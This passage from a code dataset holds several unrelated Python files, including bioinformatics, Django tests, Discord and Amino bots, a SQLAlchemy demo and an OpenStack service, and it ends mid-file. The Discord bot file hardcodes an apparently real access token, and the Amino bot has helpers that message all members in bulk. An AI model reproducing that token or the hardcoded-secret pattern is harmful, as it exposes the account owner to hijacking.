Splits the bamfile into \n\tnthread chunks and runs in parallel \"\"\"\n\tnthreads = int(nthreads)\n\tsplit_bam(output_dir, sample, nthreads)\n\n\tfiltered_cell_file=output_dir+'/DGE_filtered/'+sample+'_cell_metadata.csv'\n\tassignment_file=output_dir+'/molecule_info/'+sample+'_read_assignment.csv'\n\n\tbc_list=get_filtered_bc(filtered_cell_file)\n\tbc_umi=get_bc_umi(bc_list, assignment_file)\n\n\tPros = []\n\tfor i in range(1,nthreads+1):\n\t\tprint('Starting thread %d' %i)\n\t\tp = Process(target=filter_chunk, args=(output_dir,sample,bc_umi, config, i))\n\t\tPros.append(p)\n\t\tp.start()\n\tfor t in Pros:\n\t\tt.join() \n\n\tjoin_bam(output_dir,sample,nthreads)\n\n\tfor i in range(1,int(nthreads)+1):\n\t\tos.remove(output_dir +'/mapping/'+sample+ '.Aligned.sorted.chunk%d.bam' %i)\n\t\tos.remove(output_dir +'/atac_qc/'+sample+ '_filtered.chunk%d.bam' %i)\n\n\n\nif __name__ == '__main__':\n\timport sys\n\t\n\toutput_dir=sys.argv[1]\n\tsample=sys.argv[2]\n\tnthreads=sys.argv[3]\n\t#nthreads=4\n\tfilter_bam(output_dir,sample,int(nthreads))\n\n","sub_path":"scAR_process/filter_bam.py","file_name":"filter_bam.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"262703662","text":"\"\"\"View tests\"\"\"\nimport requests_mock\nfrom django.urls import reverse\n\nfrom gameMuster.tests.base_test import BaseTest\nfrom gameMuster.models import Platform, Genre, Screenshot, FavoriteGame\nfrom gameMuster.views import get_game_genres, get_page_obj\n\nITEMS_ON_PAGE = 4\n\n\nclass GamesIndexViewTestCase(BaseTest):\n \"\"\"Index view tests\"\"\"\n\n def test_get_page_obj(self):\n request = self.factory.get(reverse(\"index\"))\n response = self.client.get(reverse(\"index\"))\n page_obj = get_page_obj(request, ITEMS_ON_PAGE, [self.game])\n\n self.assertCountEqual(\n page_obj.object_list, response.context[\"page_obj\"].object_list\n )\n\n def test_index_get(self):\n \"\"\"Index view 
test\"\"\"\n response = self.client.get(reverse(\"index\"))\n\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, \"gameMuster/index.html\")\n\n def test_no_filters_selected(self):\n \"\"\"If no filters are selected by user\"\"\"\n response = self.client.get(reverse(\"index\"))\n\n self.assertCountEqual(response.context[\"game_list\"], [self.game])\n self.assertDictEqual(\n response.context[\"game_genres\"], get_game_genres([self.game])\n )\n self.assertCountEqual(response.context[\"platforms\"], Platform.objects.all())\n self.assertCountEqual(response.context[\"genres\"], Genre.objects.all())\n self.assertEqual(response.context[\"platforms_chosen\"], None)\n self.assertEqual(response.context[\"genres_chosen\"], None)\n self.assertEqual(response.context[\"rating\"], 50)\n\n def test_filters_selected(self):\n \"\"\"If filters are selected by user\"\"\"\n response = self.client.get(\n reverse(\"index\"),\n {\"platforms\": [self.platform.id], \"genres\": [self.genre.id], \"rating\": 0},\n )\n\n self.assertCountEqual(response.context[\"game_list\"], [self.game])\n self.assertDictEqual(\n response.context[\"game_genres\"], get_game_genres([self.game])\n )\n self.assertCountEqual(response.context[\"platforms\"], Platform.objects.all())\n self.assertCountEqual(response.context[\"genres\"], Genre.objects.all())\n self.assertCountEqual(response.context[\"platforms_chosen\"], [self.platform.id])\n self.assertCountEqual(response.context[\"genres_chosen\"], [self.genre.id])\n self.assertEqual(response.context[\"rating\"], 0)\n\n\nclass GamesDetailViewTestCase(BaseTest):\n \"\"\"Detail view tests\"\"\"\n\n @requests_mock.Mocker()\n def test_detail_get(self, mock):\n \"\"\"If game exists\"\"\"\n mock.get(\n \"https://api.twitter.com/1.1/search/tweets.json\",\n json={\n \"statuses\": {\n \"created_at\": \"Fri Jun 11 12:45:10 +0000 2021\",\n \"user\": {\"name\": self.faker.name()},\n \"full_text\": self.faker.pystr(max_chars=10),\n }\n },\n )\n url = 
reverse(\"detail\", args=(self.game.game_id,))\n response = self.client.get(url)\n\n self.assertEquals(response.status_code, 200)\n self.assertEqual(self.game, response.context[\"game\"])\n self.assertEqual(self.game.name.replace(\" \", \"\"), response.context[\"game_name\"])\n self.assertCountEqual(\n list(Genre.objects.filter(game=self.game)), response.context[\"genres\"]\n )\n self.assertCountEqual(\n list(Platform.objects.filter(game=self.game)), response.context[\"platforms\"]\n )\n self.assertCountEqual(\n list(Screenshot.objects.filter(game=self.game)),\n response.context[\"screenshots\"],\n )\n\n def test_game_does_not_exit(self):\n \"\"\"If game does not exist\"\"\"\n url = reverse(\"detail\", args=(self.game.id + 1,))\n self.client.get(url)\n\n self.assertRaises(LookupError)\n\n\nclass FavoriteGamesViewTestCase(BaseTest):\n \"\"\"Favorite games view tests\"\"\"\n\n def setUp(self):\n super().setUp()\n self.login_user()\n\n def add_game_to_favorite(self):\n return FavoriteGame.objects.create(game=self.game, user=self.user)\n\n def test_favorite_authenticated(self):\n \"\"\"Favorite main page test if user is authenticated\"\"\"\n favorite_game = self.add_game_to_favorite()\n response = self.client.get(reverse(\"favorite\"))\n\n self.assertEqual(response.status_code, 200)\n self.assertCountEqual([favorite_game.game], response.context[\"game_list\"])\n self.assertCountEqual(\n [favorite_game.game.game_id], response.context[\"favorite_game_list\"]\n )\n\n def test_favorite_not_authenticated(self):\n \"\"\"Favorite main page test if user is not authenticated\"\"\"\n self.client.logout()\n response = self.client.get(reverse(\"favorite\"))\n\n self.assertEqual(response.status_code, 302)\n","sub_path":"gameMuster/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520193851","text":"# インストールした discord.py を読み込む\r\nimport 
discord\r\n\r\n# 自分のBotのアクセストークンに置き換えてください\r\nTOKEN = 'NzEzMzM5OTAwMjgzMzIyNDU4.Xsj5Ug.fzF-rDMAmDe-dH6R29394CDA65Q'\r\n\r\n# 接続に必要なオブジェクトを生成\r\nclient = discord.Client()\r\n\r\nCHANNEL_ID =711234511710715924\r\n\r\n# 起動時に動作する処理\r\n@client.event\r\nasync def on_ready():\r\n # 起動したらターミナルにログイン通知が表示される\r\n print('ログインしただなも')\r\n\r\n# メッセージ受信時に動作する処理\r\n@client.event\r\nasync def on_message(message):\r\n # メッセージ送信者がBotだった場合は無視する\r\n if message.author.bot:\r\n return\r\n # 「/neko」と発言したら「にゃーん」が返る処理\r\n if message.content == 'たぬきち':\r\n await message.channel.send('テスト中だなも~')\r\n\t\t\r\n# Botの起動とDiscordサーバーへの接続\r\nclient.run(TOKEN)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147803054","text":"import argparse\nimport os\n\nfrom dotenv import load_dotenv\n\nfrom TheCount import TheCount\nfrom InputParser import InputParser\n\n\ndef main():\n load_dotenv()\n TOKEN = os.getenv('DISCORD_TOKEN')\n\n assert (TOKEN is not None)\n parser = argparse.ArgumentParser(\n description=\n \"\"\"\n The Count\n A Discord bot that allows you to count! 
AH AH AH!\n \"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument(\"--send-opening-message\", type=InputParser.string_to_boolean, nargs='?',\n const=True, default=True,\n help=\"Whether or not The Count should open with a greeting\")\n parser.add_argument(\"--channel\", default=\"counting\",\n help=\"The channel The Count will operate in\"),\n parser.add_argument(\"--prefix\", default=\"!\",\n help=\"The prefix that goes before each command\"),\n parser.add_argument(\"--save-interval\", default=10, type=InputParser.string_to_int,\n help=\"The Count will save its progress after n messages\")\n\n args = parser.parse_args()\n\n bot = TheCount(\n send_opening_message=args.send_opening_message,\n target_channel_name=args.channel,\n save_interval=args.save_interval,\n prefix=args.prefix\n )\n\n bot.start(TOKEN)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"620680880","text":"import sqlalchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql import and_, or_, not_\nfrom sqlalchemy.sql import text\nfrom sqlalchemy import func, desc\n\nprint(sqlalchemy.__version__)\nengine = create_engine('sqlite:///:memory:', echo=True)\nmetadata = MetaData()\n\nusers = Table('users', metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String(50)),\n Column('fullname', String(50)),\n )\n\naddresses = Table('addresses', metadata,\n Column('id', Integer, primary_key=True),\n Column('user_id', None, ForeignKey('users.id')),\n Column('email_address', String, nullable=False)\n )\n\nmetadata.create_all(engine)\nconn = engine.connect()\n\nins = users.insert()\nconn.execute(ins, name='jack', fullname='Jack Jones')\nconn.execute(ins, id=2, 
name='wendy', fullname='Wendy Williams')\n\nconn.execute(addresses.insert(), [\n {'user_id': 1, 'email_address' : 'jack@yahoo.com'},\n {'user_id': 1, 'email_address' : 'jack@msn.com'},\n {'user_id': 2, 'email_address' : 'www@www.org'},\n {'user_id': 2, 'email_address' : 'wendy@aol.com'},\n ])\n\n'''\n\ns = select([users])\n\nresult = conn.execute(s)\nfor row in result:\n print(row)\n\nresult = conn.execute(s)\nrow = result.fetchone()\nprint(\"name:\", row['name'], \"; fullname:\", row['fullname'])\nprint(\"name:\", row[1], \"; fullname:\", row[2])\n\nfor row in conn.execute(s):\n print(\"name:\", row[users.c.name], \"; fullname:\", row[users.c.fullname])\n\ns = select([users.c.name, users.c.fullname])\n\nresult = conn.execute(s)\nfor row in result:\n print (row)\n\nfor row in conn.execute(select([users, addresses]).where(users.c.id == addresses.c.user_id)):\n print (row)\n\nprint(and_(\n users.c.name.like('j%'), users.c.id == addresses.c.user_id, \\\n or_(\n addresses.c.email_address == 'wendy@aol.com',\n addresses.c.email_address == 'jack@yahoo.com'\n ), \\\n not_(users.c.id > 5)))\n\ns = select([(users.c.fullname +\n \", \" + addresses.c.email_address).\n label('title')]).\\\n where(\n and_(\n users.c.id == addresses.c.user_id,\n users.c.name.between('m', 'z'),\n or_(\n addresses.c.email_address.like('%@aol.com'),\n addresses.c.email_address.like('%@msn.com')\n )\n )\n )\nresult = conn.execute(s)\nfor row in result:\n print (row)\n\ns = text(\n \"SELECT users.fullname || ', ' || addresses.email_address AS title \"\n \"FROM users, addresses \"\n \"WHERE users.id = addresses.user_id \"\n \"AND users.name BETWEEN :x AND :y \"\n \"AND (addresses.email_address LIKE :e1 \"\n \"OR addresses.email_address LIKE :e2)\")\n\nresult = conn.execute(s, x='m', y='z', e1='%@aol.com', e2='%@msn.com')\n\nfor row in result:\n print (row)\n\nstmt = select([\n addresses.c.user_id,\n func.count(addresses.c.id).label('num_addresses')]).\\\n order_by(desc(\"num_addresses\"))\n\nresult = 
conn.execute(stmt)\nfor row in result:\n print (row)\n\nprint (users.join(addresses))\n\nprint(users.join(addresses))\n\nprint(users.join(addresses,\n addresses.c.email_address.like(users.c.name + '%')\n ))\n\ns = select([users.c.fullname]).select_from(\n users.join(addresses,\n addresses.c.email_address.like(users.c.name + '%'))\n )\nresult = conn.execute(s)\nfor row in result:\n print(row)\n\ns = select([users.c.fullname]).select_from(users.outerjoin(addresses))\nresult = conn.execute(s)\nfor row in result:\n print(row)\n\nstmt = select([users.c.name]).order_by(users.c.name)\nresult = conn.execute(stmt)\nfor row in result:\n print(row)\n\nstmt = select([users.c.name]).order_by(users.c.name.desc())\nresult = conn.execute(stmt)\nfor row in result:\n print(row)\n\nstmt = select([users.c.name, func.count(addresses.c.id)]).\\\n select_from(users.join(addresses)).\\\n group_by(users.c.name)\nresult = conn.execute(stmt)\nfor row in result:\n print(row)\n\n'''\n\nstmt = users.update().\\\n values(fullname=\"Fullname: \" + users.c.name)\nresult = conn.execute(stmt)\n\nconn.execute(users.delete().where(users.c.name > 'm'))\n\n# result.close()\n","sub_path":"sqlalchemy-playground/sqlalchemy-playground.py","file_name":"sqlalchemy-playground.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286747628","text":"#!/usr/bin/python3\n\"\"\"This module prints first name and last name.\n\nThis module has one function say_my_name.\n\"\"\"\n\n\ndef say_my_name(first_name, last_name=\"\"):\n \"\"\"Function say my name.\n\n This function check the right first and last name\n and prints:\n\n Args:\n first_name (str): The first parameter has to be string.\n last_name (str): The second parameter has to be string-\n\n Returns:\n not return\n\n \"\"\"\n if (type(first_name) != str or first_name is None):\n raise TypeError(\"first_name must be a string\")\n elif (type(last_name) != str or 
last_name is None):\n raise TypeError(\"last_name must be a string\")\n else:\n print(\"My name is {:s} {:s}\".format(first_name, last_name))\n","sub_path":"0x07-python-test_driven_development/3-say_my_name.py","file_name":"3-say_my_name.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"435766422","text":"# Copyright 2017 - Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport multiprocessing\nimport time\n\nfrom oslo_concurrency import processutils\nfrom oslo_log import log\nfrom oslo_service import service as os_service\n\nfrom vitrage.entity_graph import EVALUATOR_TOPIC\nfrom vitrage.evaluator.evaluator_base import EvaluatorBase\n\nfrom vitrage.evaluator.scenario_evaluator import ScenarioEvaluator\nfrom vitrage.evaluator.scenario_repository import ScenarioRepository\nfrom vitrage.messaging import VitrageNotifier\n\nLOG = log.getLogger(__name__)\n\n\nSTART_EVALUATION = 'start_evaluation'\nPOISON_PILL = None\n\n\nclass EvaluatorManager(EvaluatorBase):\n\n def __init__(self, conf, entity_graph):\n super(EvaluatorManager, self).__init__(conf, entity_graph)\n self._workers_num = conf.evaluator.workers or \\\n processutils.get_worker_count()\n self._worker_queues = list()\n self._p_launcher = os_service.ProcessLauncher(conf)\n\n def run_evaluator(self):\n LOG.info('Starting %s Evaluator Processes', str(self._workers_num))\n for i in range(self._workers_num):\n 
self._add_worker(enabled=False)\n self._notify_all(None, None, None, evaluator_action=START_EVALUATION)\n self._entity_graph.subscribe(self._notify_all)\n\n def _add_worker(self, enabled=False):\n \"\"\"Create an EvaluatorWorker and it's task queue\n\n The new worker is initialized with a scenario repository\n that only contains a portion of the templates\n \"\"\"\n scenario_repo = ScenarioRepository(\n self._conf,\n len(self._worker_queues),\n self._workers_num)\n tasks_queue = multiprocessing.JoinableQueue()\n w = EvaluatorWorker(\n self._conf,\n tasks_queue,\n self._entity_graph,\n scenario_repo,\n enabled)\n self._p_launcher.launch_service(w)\n self._worker_queues.append(tasks_queue)\n\n def _notify_all(self, before, current, is_vertex, *args, **kwargs):\n \"\"\"Notify all workers\n\n This method is subscribed to entity graph changes.\n Per each change in the main entity graph, this method will notify\n each of the evaluators, causing them to update their own graph.\n \"\"\"\n evaluator_action = kwargs.get('evaluator_action', None)\n self._notify_and_wait((before, current, is_vertex, evaluator_action))\n\n def _notify_and_wait(self, payload):\n for q in self._worker_queues:\n q.put(payload)\n time.sleep(0) # context switch before join\n for q in self._worker_queues:\n q.join()\n\n def stop_all_workers(self):\n self._notify_and_wait(POISON_PILL)\n for q in self._worker_queues:\n q.close()\n self._worker_queues = list()\n\n def reload_all_workers(self, enabled=True):\n self.stop_all_workers()\n for i in range(self._workers_num):\n self._add_worker(enabled=enabled)\n\n\nclass EvaluatorWorker(os_service.Service):\n def __init__(self,\n conf,\n task_queue,\n entity_graph,\n scenario_repo,\n enabled=False):\n super(EvaluatorWorker, self).__init__()\n self._conf = conf\n self._task_queue = task_queue\n self._entity_graph = entity_graph\n self._scenario_repo = scenario_repo\n self._enabled = enabled\n self._evaluator = None\n\n def start(self):\n super(EvaluatorWorker, 
self).start()\n actions_callback = VitrageNotifier(\n conf=self._conf,\n publisher_id='vitrage_evaluator',\n topic=EVALUATOR_TOPIC).notify\n self._entity_graph.notifier._subscriptions = [] # Quick n dirty\n self._evaluator = ScenarioEvaluator(\n self._conf,\n self._entity_graph,\n self._scenario_repo,\n actions_callback,\n self._enabled)\n self.tg.add_thread(self._read_queue)\n LOG.info(\"EvaluatorWorkerService - Started!\")\n self._evaluator.scenario_repo.log_enabled_scenarios()\n\n def _read_queue(self):\n while True:\n next_task = self._task_queue.get()\n if next_task is POISON_PILL:\n self._task_queue.task_done()\n break\n try:\n self._do_task(next_task)\n except Exception as e:\n LOG.exception(\"Graph may not be in sync: exception %s\", e)\n self._task_queue.task_done()\n # Evaluator queue may have been updated, thus the sleep:\n time.sleep(0)\n\n def _do_task(self, task):\n (before, current, is_vertex, action) = task\n if not action:\n self._graph_update(before, current, is_vertex)\n elif action == START_EVALUATION:\n self._evaluator.run_evaluator()\n\n def _graph_update(self, before, current, is_vertex):\n if current:\n if is_vertex:\n self._entity_graph.add_vertex(current)\n else:\n self._entity_graph.add_edge(current)\n else:\n if is_vertex:\n self._entity_graph.delete_vertex(before)\n else:\n self._entity_graph.delete_edge(before)\n\n def stop(self, graceful=False):\n super(EvaluatorWorker, self).stop(graceful)\n self.tg.stop()\n LOG.info(\"EvaluatorWorkerService - Stopped!\")\n","sub_path":"vitrage/evaluator/evaluator_service.py","file_name":"evaluator_service.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228080233","text":"import os\nimport sys\nimport duckduckpy\nimport time\nfrom datetime import date\nimport text2pdf\nimport threading\nimport bs4\nimport requests\nimport urllib.request\nimport json\nimport random\nfrom random import uniform\nfrom 
pprint import pprint\nfrom gtts import gTTS, lang\nfrom youtube_search import YoutubeSearch\nfrom google_trans_new import google_translator\nfrom json import dumps, load\nfrom time import sleep\nfrom io import BytesIO\nfrom string import hexdigits\nfrom string import punctuation\nfrom random import choice, randint, sample\nfrom pathlib import Path\nfrom threading import Thread\nfrom contextlib import suppress\nfrom unicodedata import normalize\n\nfrom pdf2image import convert_from_path\nfrom youtube_dl import YoutubeDL\nfrom amino.client import Client\nfrom amino.sub_client import SubClient\n\n# Big optimisation thanks to SempreLEGIT#1378 ♥\nversion = \"1.6.3\"\nprint(f\"version : {version}\")\n\npath_utilities = \"utilities\"\npath_amino = 'utilities/amino_list'\npath_picture = 'utilities/pictures'\npath_sound = 'utilities/sound'\npath_download = 'utilities/download'\npath_config = \"utilities/config.json\"\npath_client = \"client.txt\"\n\nfor i in (path_utilities, path_picture, path_sound, path_download, path_amino):\n\tPath(i).mkdir(exist_ok=True)\n\n\nclass BotAmino:\n\tdef __init__(self, client, community, inv: str = None):\n\t\tself.client = client\n\t\tself.lvl_min = 0\n\t\tself.marche = True\n\n\t\tif isinstance(community, int):\n\t\t\tself.community_id = community\n\t\t\tself.community = self.client.get_community_info(\n\t\t\t comId=self.community_id)\n\t\t\tself.community_amino_id = self.community.aminoId\n\t\telse:\n\t\t\tself.community_amino_id = community\n\t\t\tself.informations = self.client.get_from_code(\n\t\t\t f\"http://aminoapps.com/c/{community}\")\n\t\t\tself.community_id = self.informations.json[\"extensions\"][\n\t\t\t \"community\"][\"ndcId\"]\n\t\t\tself.community = self.client.get_community_info(\n\t\t\t comId=self.community_id)\n\n\t\tself.community_name = self.community.name\n\t\ttry:\n\t\t\tself.community_leader_agent_id = self.community.json[\"agent\"][\n\t\t\t \"uid\"]\n\t\texcept Exception:\n\t\t\tself.community_leader_agent_id = 
\"\"\n\n\t\ttry:\n\t\t\tself.community_staff_list = self.community.json[\n\t\t\t \"communityHeadList\"]\n\t\texcept Exception:\n\t\t\tself.community_staff_list = \"\"\n\n\t\tif self.community_staff_list:\n\t\t\tself.community_leaders = [\n\t\t\t elem[\"uid\"] for elem in self.community_staff_list\n\t\t\t if elem[\"role\"] in (100, 102)\n\t\t\t]\n\t\t\tself.community_curators = [\n\t\t\t elem[\"uid\"] for elem in self.community_staff_list\n\t\t\t if elem[\"role\"] == 101\n\t\t\t]\n\t\t\tself.community_staff = [\n\t\t\t elem[\"uid\"] for elem in self.community_staff_list\n\t\t\t]\n\n\t\tif not Path(f'{path_amino}/{self.community_amino_id}.json').exists():\n\t\t\tself.create_community_file()\n\n\t\told_dict = self.get_file_dict()\n\t\tnew_dict = self.create_dict()\n\n\t\tfor key, value in new_dict.items():\n\t\t\tif key not in old_dict:\n\t\t\t\told_dict[key] = value\n\n\t\tfor key, value in old_dict.items():\n\t\t\tif key not in new_dict:\n\t\t\t\tdel old_dict[key]\n\n\t\tself.update_file(old_dict)\n\n\t\tself.subclient = SubClient(comId=self.community_id,\n\t\t profile=client.profile)\n\t\tself.banned_words = self.get_file_info(\"banned_words\")\n\t\tself.message_bvn = self.get_file_info(\"welcome\")\n\t\tself.locked_command = self.get_file_info(\"locked_command\")\n\t\tself.admin_locked_command = self.get_file_info(\"admin_locked_command\")\n\t\tself.welcome_chat = self.get_file_info(\"welcome_chat\")\n\t\tself.only_view = self.get_file_info(\"only_view\")\n\t\tself.prefix = self.get_file_info(\"prefix\")\n\t\tself.level = self.get_file_info(\"level\")\n\t\tself.favorite_users = self.get_file_info(\"favorite_users\")\n\t\tself.favorite_chats = self.get_file_info(\"favorite_chats\")\n\t\tself.subclient.activity_status(\"on\")\n\t\tnew_users = self.subclient.get_all_users(start=0,\n\t\t size=30,\n\t\t type=\"recent\")\n\t\tself.new_users = [\n\t\t elem[\"uid\"] for elem in new_users.json[\"userProfileList\"]\n\t\t]\n\t\tif self.welcome_chat or 
self.message_bvn:\n\t\t\twith suppress(Exception):\n\t\t\t\tThread(target=self.check_new_member).start()\n\n\tdef create_community_file(self):\n\t\twith open(f'{path_amino}/{self.community_amino_id}.json',\n\t\t 'w',\n\t\t encoding='utf8') as file:\n\t\t\tdict = self.create_dict()\n\t\t\tfile.write(dumps(dict, sort_keys=False, indent=4))\n\n\tdef create_dict(self):\n\t\treturn {\n\t\t \"welcome\": \"\",\n\t\t \"banned_words\": [],\n\t\t \"locked_command\": [],\n\t\t \"admin_locked_command\": [],\n\t\t \"prefix\": \"/\",\n\t\t \"only_view\": [],\n\t\t \"welcome_chat\": \"\",\n\t\t \"level\": 6,\n\t\t \"favorite_users\": [],\n\t\t \"favorite_chats\": []\n\t\t}\n\n\tdef get_dict(self):\n\t\treturn {\n\t\t \"welcome\": self.message_bvn,\n\t\t \"banned_words\": self.banned_words,\n\t\t \"locked_command\": self.locked_command,\n\t\t \"admin_locked_command\": self.admin_locked_command,\n\t\t \"prefix\": self.prefix,\n\t\t \"only_view\": self.only_view,\n\t\t \"welcome_chat\": self.welcome_chat,\n\t\t \"level\": self.level,\n\t\t \"favorite_users\": self.favorite_users,\n\t\t \"favorite_chats\": self.favorite_chats\n\t\t}\n\n\tdef update_file(self, dict=None):\n\t\tif not dict:\n\t\t\tdict = self.get_dict()\n\t\twith open(f\"{path_amino}/{self.community_amino_id}.json\",\n\t\t \"w\",\n\t\t encoding=\"utf8\") as file:\n\t\t\tfile.write(dumps(dict, sort_keys=False, indent=4))\n\n\tdef get_file_info(self, info: str = None):\n\t\twith open(f\"{path_amino}/{self.community_amino_id}.json\",\n\t\t \"r\",\n\t\t encoding=\"utf8\") as file:\n\t\t\treturn load(file)[info]\n\n\tdef get_file_dict(self, info: str = None):\n\t\twith open(f\"{path_amino}/{self.community_amino_id}.json\",\n\t\t \"r\",\n\t\t encoding=\"utf8\") as file:\n\t\t\treturn load(file)\n\n\tdef set_prefix(self, prefix: str):\n\t\tself.prefix = prefix\n\t\tself.update_file()\n\n\tdef set_level(self, level: int):\n\t\tself.level = level\n\t\tself.update_file()\n\n\tdef set_welcome_message(self, message: 
str):\n\t\tself.message_bvn = message.replace('\"', '“')\n\t\tself.update_file()\n\n\tdef set_welcome_chat(self, chatId: str):\n\t\tself.welcome_chat = chatId\n\t\tself.update_file()\n\n\tdef add_locked_command(self, liste: list):\n\t\tself.locked_command.extend(liste)\n\t\tself.update_file()\n\n\tdef add_admin_locked_command(self, liste: list):\n\t\tself.admin_locked_command.extend(liste)\n\t\tself.update_file()\n\n\tdef add_banned_words(self, liste: list):\n\t\tself.banned_words.extend(liste)\n\t\tself.update_file()\n\n\tdef add_only_view(self, chatId: str):\n\t\tself.only_view.append(chatId)\n\t\tself.update_file()\n\n\tdef add_favorite_users(self, value: str):\n\t\tself.favorite_users.append(value)\n\t\tself.update_file()\n\n\tdef add_favorite_chats(self, value: str):\n\t\tself.favorite_chats.append(value)\n\t\tself.update_file()\n\n\tdef remove_locked_command(self, liste: list):\n\t\t[\n\t\t self.locked_command.remove(elem) for elem in liste\n\t\t if elem in self.locked_command\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_admin_locked_command(self, liste: list):\n\t\t[\n\t\t self.admin_locked_command.remove(elem) for elem in liste\n\t\t if elem in self.admin_locked_command\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_banned_words(self, liste: list):\n\t\t[\n\t\t self.banned_words.remove(elem) for elem in liste\n\t\t if elem in self.banned_words\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_favorite_users(self, value: str):\n\t\tliste = [value]\n\t\t[\n\t\t self.favorite_users.remove(elem) for elem in liste\n\t\t if elem in self.favorite_users\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_favorite_chats(self, value: str):\n\t\tliste = [value]\n\t\t[\n\t\t self.favorite_chats.remove(elem) for elem in liste\n\t\t if elem in self.favorite_chats\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_only_view(self, chatId: str):\n\t\tself.only_view.remove(chatId)\n\t\tself.update_file()\n\n\tdef unset_welcome_chat(self):\n\t\tself.welcome_chat = 
\"\"\n\t\tself.update_file()\n\n\tdef is_in_staff(self, uid):\n\t\treturn uid in self.community_staff\n\n\tdef is_leader(self, uid):\n\t\treturn uid in self.community_leaders\n\n\tdef is_curator(self, uid):\n\t\treturn uid in self.community_curators\n\n\tdef is_agent(self, uid):\n\t\treturn uid == self.community_leader_agent_id\n\n\tdef accept_role(self, rid: str = None, cid: str = None):\n\t\twith suppress(Exception):\n\t\t\tself.subclient.accept_organizer(cid)\n\t\t\treturn True\n\t\twith suppress(Exception):\n\t\t\tself.subclient.promotion(noticeId=rid)\n\t\t\treturn True\n\t\treturn False\n\n\tdef get_staff(self, community):\n\t\tif isinstance(community, int):\n\t\t\twith suppress(Exception):\n\t\t\t\tcommunity = self.client.get_community_info(com_id=community)\n\t\telse:\n\t\t\ttry:\n\t\t\t\tinformations = self.client.get_from_code(\n\t\t\t\t f\"http://aminoapps.com/c/{community}\")\n\t\t\texcept Exception:\n\t\t\t\treturn False\n\n\t\t\tcommunity_id = informations.json[\"extensions\"][\"community\"][\n\t\t\t \"ndcId\"]\n\t\t\tcommunity = self.client.get_community_info(comId=community_id)\n\n\t\ttry:\n\t\t\tcommunity_staff_list = community.json[\"communityHeadList\"]\n\t\t\tcommunity_staff = [elem[\"uid\"] for elem in community_staff_list]\n\t\texcept Exception:\n\t\t\tcommunity_staff_list = \"\"\n\t\telse:\n\t\t\treturn community_staff\n\n\tdef get_user_id(self, user_name):\n\t\tsize = self.subclient.get_all_users(\n\t\t start=0, size=1, type=\"recent\").json['userProfileCount']\n\t\tsize2 = size\n\n\t\tst = 0\n\t\twhile size > 0:\n\t\t\tvalue = size\n\t\t\tif value > 100:\n\t\t\t\tvalue = 100\n\n\t\t\tusers = self.subclient.get_all_users(start=st, size=value)\n\t\t\tfor user in users.json['userProfileList']:\n\t\t\t\tif user_name == user['nickname'] or user_name == user['uid']:\n\t\t\t\t\treturn (user[\"nickname\"], user['uid'])\n\t\t\tsize -= 100\n\t\t\tst += 100\n\n\t\tsize = size2\n\n\t\tst = 0\n\t\twhile size > 0:\n\t\t\tvalue = size\n\t\t\tif value > 
100:\n\t\t\t\tvalue = 100\n\n\t\t\tusers = self.subclient.get_all_users(start=st, size=value)\n\t\t\tfor user in users.json['userProfileList']:\n\t\t\t\tif user_name.lower() in user['nickname'].lower():\n\t\t\t\t\treturn (user[\"nickname\"], user['uid'])\n\t\t\tsize -= 100\n\t\t\tst += 100\n\n\t\treturn False\n\n\tdef ask_all_members(self, message, lvl: int = 20, type_bool: int = 1):\n\t\tsize = self.subclient.get_all_users(\n\t\t start=0, size=1, type=\"recent\").json['userProfileCount']\n\t\tst = 0\n\n\t\twhile size > 0:\n\t\t\tvalue = size\n\t\t\tif value > 100:\n\t\t\t\tvalue = 100\n\t\t\tusers = self.subclient.get_all_users(start=st, size=value)\n\t\t\tif type_bool == 1:\n\t\t\t\tuser_lvl_list = [\n\t\t\t\t user['uid'] for user in users.json['userProfileList']\n\t\t\t\t if user['level'] == lvl\n\t\t\t\t]\n\t\t\telif type_bool == 2:\n\t\t\t\tuser_lvl_list = [\n\t\t\t\t user['uid'] for user in users.json['userProfileList']\n\t\t\t\t if user['level'] <= lvl\n\t\t\t\t]\n\t\t\telif type_bool == 3:\n\t\t\t\tuser_lvl_list = [\n\t\t\t\t user['uid'] for user in users.json['userProfileList']\n\t\t\t\t if user['level'] >= lvl\n\t\t\t\t]\n\t\t\tself.subclient.start_chat(userId=user_lvl_list, message=message)\n\t\t\tsize -= 100\n\t\t\tst += 100\n\n\tdef ask_amino_staff(self, message):\n\t\tself.subclient.start_chat(userId=self.community_staff, 